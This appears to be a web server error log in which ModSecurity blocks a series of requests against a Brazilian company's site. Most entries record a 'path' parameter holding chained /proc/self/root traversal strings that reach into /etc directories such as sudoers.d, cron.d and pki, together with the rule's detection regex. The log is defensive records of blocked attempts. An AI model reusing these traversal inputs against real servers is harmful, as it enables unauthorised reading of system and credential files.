[Wed Mar 18 08:51:23.311577 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:50600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRuta6ubjKNq_cu4aFFwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:51:27.200142 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:56996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRvOyqAr6etmhZHNqqWgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:51:34.419591 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:52280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRxsdf6f5d65gmYZTAugAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:51:36.826950 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:38846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqRyOoXxyEfFpUF8f9bBwAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:52:36.935133 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:38852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSBPu8EFLIOrSqIpvx5gAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:52:38.349185 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:47304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSBta6ubjKNq_cu4aFRgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:52:49.747743 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:38888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSEfu8EFLIOrSqIpvx_gAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:52:58.009540 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:55602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSGuoXxyEfFpUF8f9bNQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:53:11.936356 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 57.141.18.32:34676] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:53:32.358568 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:55606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSPNY0UrI5A3LftIyOjAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:53:33.641866 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:45710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSPfu8EFLIOrSqIpvyFgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:53:37.328252 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:45716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSQda6ubjKNq_cu4aFcwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:53:44.573066 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:45724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSR-oXxyEfFpUF8f9bQwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:53:47.307363 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:58724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSS9Y0UrI5A3LftIyOmgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:53:48.583819 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:58740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSTPu8EFLIOrSqIpvyIQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:53:49.915208 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:57132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSTdY0UrI5A3LftIyOoQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:53:51.219588 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:57148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqST-oXxyEfFpUF8f9bRAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:54:14.166419 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:57158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSZew_le52K8_3pV3NAgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:54:15.488937 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:50660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSZ-oXxyEfFpUF8f9bSwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:54:21.073485 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:50668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSbeoXxyEfFpUF8f9bUQAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:54:27.049173 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:48624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSc-yqAr6etmhZHNqqzQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:54:28.304095 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:48630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSdNa6ubjKNq_cu4aFiAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
